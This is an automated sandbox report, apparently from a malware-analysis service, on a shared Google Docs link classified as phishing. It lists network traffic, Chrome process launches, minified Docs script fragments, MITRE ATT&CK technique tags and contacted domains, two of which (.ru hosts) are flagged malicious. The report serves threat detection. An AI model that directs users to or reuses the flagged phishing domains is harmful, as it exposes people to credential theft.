              Source: unknownNetwork traffic detected: HTTP traffic on port 63094 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 63033 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62953
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62958
              Source: unknownNetwork traffic detected: HTTP traffic on port 62960 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63088
              Source: unknownNetwork traffic detected: HTTP traffic on port 62968 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63020
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62966
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62967
              Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62968
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62960
              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 63025 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 63105 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63032
              Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62975
              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62979
              Source: unknownNetwork traffic detected: HTTP traffic on port 63064 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63025
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63041
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63040
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 62979 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62987
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 63084 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63033
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 63103 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 62958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 62987 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 63020 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63064
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 63108 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
              Source: unknownNetwork traffic detected: HTTP traffic on port 62967 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 63040 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
              Source: unknownNetwork traffic detected: HTTP traffic on port 62947 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 62953 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63108
              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
              Source: unknownNetwork traffic detected: HTTP traffic on port 63041 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 62966 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63103
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63105
              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 62975 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63084
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 63032 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62947
              Source: unknownNetwork traffic detected: HTTP traffic on port 63088 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
              Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: classification engineClassification label: mal68.phis.win@18/392@54/20
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2036,i,6415178722082897900,11855059784597257511,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321f"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2036,i,6415178722082897900,11855059784597257511,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: Binary string: uTq.prototype.fb=function(){uTq.Uc.fb.call(this);this.R.dispose();this.F.dispose()};function wTq(a,c,e){e=e===void 0?!1:e;uTq.call(this,a,25);this.ma=e;this.va=!e;this.W=c}H(wTq,uTq);wTq.prototype.V=function(a,c,e){var f=0,g=a<this.W;a<c&&g?f=-Qpn(5,75,Dr((Math.min(this.W,c)-a)/25,0,1)):a>c+e&&!g&&(f=Qpn(5,75,Dr((a-Math.max(this.W,c+e))/25,0,1)));return f};function xTq(a,c,e,f,g){f=f||(c?zs(Cs(c)):zs());this.Zg=a;a=f.kd().body;var h=this.Zg.Ba();a.appendChild(h);mt(this.Zg.Ba(),!1);this.className=sbi();Deo.call(this,c,e,f);this.xa(this.Zg);this.AS(this.Zg.Ba());c=RAh(this.Zg.Ba(),.13);e=SAh(this.Zg.Ba(),.13);this.RK(c,e);this.H=new VBh(sbi(),!0);WBh(this.H,g!=null?g:1,void 0,void 0,-1);XBh(this.H,this.Zg.Ba(),this.Zg.D);this.H.I8a=!0;this.Pdb=300}Em(xTq,Deo);D=xTq.prototype;D.VHb=function(a,c,e,f){WBh(this.H,a,c,e,f)}; source: chromecache_248.2.dr
              Source: Binary string: D.NCb=function(a){var c;(c=this.D,c()).NCb(a)};D.UBb=function(a,c,e){var f;(f=this.D,f()).UBb(a,c,e)};D.aIa=function(a,c,e,f){var g;(g=this.D,g()).aIa(a,c,e,f)};D.nrb=function(a){var c;(c=this.D,c()).nrb(a)};D.pDb=function(a,c){var e;(e=this.D,e()).pDb(a,c)};D.Xeb=function(a,c){var e;(e=this.D,e()).Xeb(a,c)};D.In=function(){var a;return(a=this.D,a()).In()};D.Fo=function(){var a;return(a=this.D,a()).Fo()};D.ZL=function(){var a;return(a=this.D,a()).ZL()};D.xD=function(a){var c;return(c=this.D,c()).xD(a)}; source: chromecache_443.2.dr, chromecache_287.2.dr
              Source: Binary string: D.pDb=function(a,c){Bt(!Ou(a,c),"Oy");Bt(this.J,"Attempted to move a chapter in an unchaptered document.");eae(this,a);c=U$c(a,c);dae(this,c);var e=this.D.get(a).getId();this.D.move(a,c);R$d(this.F,this.F.V,e)}; source: chromecache_443.2.dr, chromecache_287.2.dr
              Source: Binary string: D.getName=function(a,c){a=myh(a,0).toString(16);this.H.has(a)?(a=this.H.get(a),c(a)):(this.D.isActive()&&this.D.abort(),this.J&&BI(this.J),c=Bm(this.Cyc,this,a,c),this.J=yI(this.D,Md,c),xeo(this,"c",a,this.D))};D.Cyc=function(a,c){yeo(this,this.D);a=this.H.has(a)?this.H.get(a):null;c(a)};function yeo(a,c){if(c.Bu()){c=c.o_();for(var e in c)c[e].hasOwnProperty(dQ)&&a.H.set(e,c[e].name)}}function xeo(a,c,e,f){a=new OF(a.R);FR(a,c,e);FR(a,"p",dQ);f.send(a)};function zeo(a){this.data=new veo;this.F=a;this.D=new teo}var Aeo;function Beo(a){Aeo||(Aeo=new zeo(a||new weo("//i18n-cloud.appspot.com/cproperties")));return Aeo};function Ceo(a,c){this.gj=a instanceof Gr?a:new Gr(a,c)}Em(Ceo,gbh);Ceo.prototype.xd=function(a,c,e,f){xS(Pyb(a),0,a,c,this.gj,e,null,f)};function Deo(a,c,e){this.ee=e||(a?zs(Cs(a)):zs());$Bh.call(this,this.ee.Na(ab,{style:"position:absolute;display:none;"}));this.Lp=new Gr(1,1);this.F=new Set;this.J=null;a&&this.attach(a);c!=null&&this.KFa(c)}Em(Deo,$Bh);var Eeo=[];D=Deo.prototype;D.pF=null;D.className="goog-tooltip";D.Pdb=500;D.Myb=0;D.Ma=x("ee");D.attach=function(a){a=Cs(a);this.F.add(a);xI(a,ej,this.lw,!1,this);xI(a,dj,this.Jya,!1,this);xI(a,cj,this.yta,!1,this);xI(a,lh,this.Ol,!1,this);xI(a,Rc,this.Jya,!1,this)}; source: chromecache_248.2.dr
              Source: Binary string: function Ass(a,c){c=P5(c)&&Dq(N5(c),asn,27,y1);if(!c)return a.D.Fc(Error("rea")),!1;if(!Wp(c,Zrn,2,$rn))return a.D.Fc(Error("Fea")),!1;c=c.getResponse();if(!Zq(c,1))return a.D.Fc(Error("Gea")),!1;switch(rq(c,2)){case 0:return a.D.Fc(Error("Hea")),!1;case 1:if($q(c,3))return a.D.Fc(Error("Iea")),!1;break;case 2:if(!$q(c,3)||rq(c,3)===0)return a.D.Fc(Error("Jea")),!1}return!0};function Lss(){bV.apply(this,arguments)}H(Lss,bV);Lss.prototype.Xd=B("app-switcher-menu");Lss.Bb=function(){return NF(Lss)};function Mss(a,c,e,f,g){a=a===void 0?!1:a;c=c===void 0?!0:c;f=f===void 0?null:f;Deo.call(this,e,f,g);this.Aa=a;this.H=c;this.wa=f;this.className="companion-tooltip";aCh(this,this.Aa?this.H?3:13:this.H?2:12);this.Myb=this.Pdb=150;eBh(this,!0)}H(Mss,Deo);Mss.prototype.Rpa=function(){if(!Deo.prototype.Rpa.call(this))return!1;var a=this.dn();if(!a)return!1;var c=this.wa||pT(a);a=Myh(a,Ue);if(!c||a==zl)return!1;this.KFa(c);return!0}; source: chromecache_248.2.dr
              Source: Binary string: new yE),xE(a,vua,new yE),xE(a,Vxa,new yE),xE(a,BIa,new yE),xE(a,ug,new yE),uOc(a,C),xE(a,Qf,new yE));return a};function I2e(){this.F=new cNd;this.D={};Xu(this.D,"nm",Qf)}H(I2e,K);I2e.prototype.getType=function(a){var c=a.ty;return c in this.D?this.D[c]:this.F.getType(a)};function J2e(){}H(J2e,K);J2e.prototype.apply=function(a,c){c.UBb(a.Bf(),a.F,a.getPath());return!1};J2e.prototype.lI=B(null);function K2e(){}H(K2e,K);K2e.prototype.apply=function(a,c){c.nrb(a.getPath());return!1};K2e.prototype.lI=B(null);function L2e(a){this.R=N_a;qt(xPb(a,(gF(),aWc)));H$d.validate(a);this.F=a}H(L2e,Fx);function M2e(){}H(M2e,K);M2e.prototype.apply=function(a,c){c.NCb(a.F);var e=c.p4();a=AUe(e);a!=null&&(zUe(e,null),rt(c.In(),"dF"),e=hF(),e=a==null?e.remove((NI(),iae)):e.update((NI(),iae),a),c.iY((NI(),jae).apply(c.Jc(),e.oa())));return!1};M2e.prototype.lI=B(null);function N2e(a,c){this.R=U_a;rt(!Ou(a,c),"mG");this.F=M$d(a);this.O=M$d(c)}H(N2e,Fx);N2e.prototype.oC=G(854);N2e.prototype.d$=G(857);N2e.prototype.pWa=!0;function O2e(){}H(O2e,K);O2e.prototype.apply=function(a,c){c.pDb(a.F,a.O);return!1};O2e.prototype.lI=B(null);function P2e(a,c){this.D=a;this.F=c}H(P2e,K);P2e.prototype.apply=function(a,c){if(u$d(a))return this.F.apply(a,c);qt(Go(a.getType(),Qf));return this.D.apply(a,c)};P2e.prototype.lI=function(a,c,e){if(u$d(a))return this.F.lI(a,c,e);qt(Go(a.getType(),Qf));return this.D.lI(a,c,e)};function Q2e(a){this.D=a}H(Q2e,K);Q2e.prototype.apply=function(a,c){return this.D.apply(a.F,c.p4())};Q2e.prototype.lI=function(a,c,e){return(a=this.D.lI(a.F,c.p4(),e))?new fPc(a,new II("")):null};function R2e(a,c){this.R=m1a;this.O=a;rt(RVc(c,(gF(),H$d).D),"nG");rt(!$Vc(c),"oG");H$d.validate(c.D);this.F=c}H(R2e,Fx);R2e.prototype.Bf=x("O");function S2e(){}H(S2e,K);S2e.prototype.apply=function(a,c){var e=a.Bf(),f=c.WT(e).Jc();a=(gF(),J$d).apply(f,a.F);if(f.Ua(a))return!0;c.Xeb(e,a);return!1};S2e.prototype.lI=B(null);function T2e(a){this.R=n1a;rt(RVc(a,(NI(),cae).D),"pG");cae.validate(a.D);this.F=a}H(T2e,Fx);function U2e(){}H(U2e,K);U2e.prototype.apply=function(a,c){var e=c.Jc();a=(NI(),jae).apply(e,a.F);if(e.Ua(a))return!0;c.iY(a);return!1};U2e.prototype.lI=B(null);function V2e(a,c,e){mOc(a);uE(a,XPa,new HPc);uE(a,yGa,new oPc);uE(a,vua,new cOc);uE(a,Vxa,new JOc);uE(a,BIa,new xPc);uE(a,ug,new LPc);oWc(new EKd).forEach(function(h,k){uE(a,h,k)});uE(a,N_a,new M2e);uE(a,n1a,new U2e);uE(a,GYa,new J2e);uE(a,RZa,new K2e);uE(a,U_a,new O2e);uE(a,m1a,new S2e);c=new Q2e(c);var f=Oy((kce(),lce),{"docs-nestedModel":!0}),g;for(g in f)uE(a,g,c);e=new P2e(ePc(e,Qbe()),c);uE(a,Qf,e)};function W2e(){this.D=0}H(W2e,Im);function X2e(a,c){var e=new W2e;e.H=a;e.D=c;return e}var Y2e=X2e("APPLIER",0),Z2e=X2e("INVERTER",1),$2e=X2e("SERIALIZER",2),a3e=X2e("COMPACTOR",3);function b3e(){}H(b3e,K);function c3e(a){var c=new b3e;c.D=ou(nBb());c.H=a;return c}function d3e(a,c){a.F=c;return a}function e3e(a){Dt(a.F);nu(a.D,Y2e);return a}function f3e(a,c,e){Dt(a.F);a.J=c;a.R=e;nu(a.D,Z2e);return a}function g3e(a
              Source: Binary string: D.Jya=function(a){var c=Ieo(this,a.target),e=Ieo(this,a.relatedTarget);c!=e&&(c==this.pF&&(this.pF=null),Geo(this),this.Ca=!1,!this.isVisible()||a.relatedTarget&&Os(this.Ba(),a.relatedTarget)?this.anchor=void 0:this.VUa())};D.oyb=function(){var a=this.Ba();this.pF!=a&&(this.Sla(),this.pF=a)};D.J8b=function(a){var c=this.Ba();this.pF!=c||a.relatedTarget&&Os(c,a.relatedTarget)||(this.pF=null,this.VUa())};function Jeo(a,c,e){a.O||(a.O=EI(Bm(a.ujb,a,c,e),a.Pdb))} source: chromecache_248.2.dr
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              Browser Extensions
              1
              Process Injection
              1
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Registry Run Keys / Startup Folder
              1
              Registry Run Keys / Startup Folder
              1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321f0%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://asx-frontend-autopush.corp.google.de/tools/feedback/0%Avira URL Cloudsafe
              https://asx-frontend-autopush.corp.google.co.uk/tools/feedback/0%Avira URL Cloudsafe
              https://asx-frontend-autopush.corp.google.co.uk/inapp/0%Avira URL Cloudsafe
              https://content-googleapis-staging.sandbox.google.com0%Avira URL Cloudsafe
              https://content-googleapis-test.sandbox.google.com0%Avira URL Cloudsafe
              http://localhost.proxy.googlers.com/inapp/0%Avira URL Cloudsafe
              https://asx-frontend-autopush.corp.google.com/inapp/0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              docs.google.com
              142.250.185.206
              truefalse
                high
                2ya.leyapham.ru
                188.114.96.3
                truetrue
                  unknown
                  plus.l.google.com
                  216.58.206.78
                  truefalse
                    high
                    developers.cloudflare.com
                    104.16.2.189
                    truefalse
                      high
                      3iff5.biijvi.ru
                      104.21.20.57
                      truefalse
                        unknown
                        appsgenaiserver-pa.clients6.google.com
                        142.250.186.170
                        truefalse
                          high
                          play.google.com
                          142.250.181.238
                          truefalse
                            high
                            browserchannel-sites.l.google.com
                            108.177.15.189
                            truefalse
                              high
                              code.jquery.com
                              151.101.2.137
                              truefalse
                                high
                                cdnjs.cloudflare.com
                                104.17.25.14
                                truefalse
                                  high
                                  challenges.cloudflare.com
                                  104.18.95.41
                                  truefalse
                                    high
                                    www.google.com
                                    172.217.18.4
                                    truefalse
                                      high
                                      peoplestack-pa.clients6.google.com
                                      142.250.185.234
                                      truefalse
                                        high
                                        0.docs.google.com
                                        unknown
                                        unknownfalse
                                          high
                                          contacts.google.com
                                          unknown
                                          unknownfalse
                                            high
                                            apis.google.com
                                            unknown
                                            unknownfalse
                                              high
                                              NameMaliciousAntivirus DetectionReputation
                                              https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=config/exm=card,client,gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_3false
                                                high
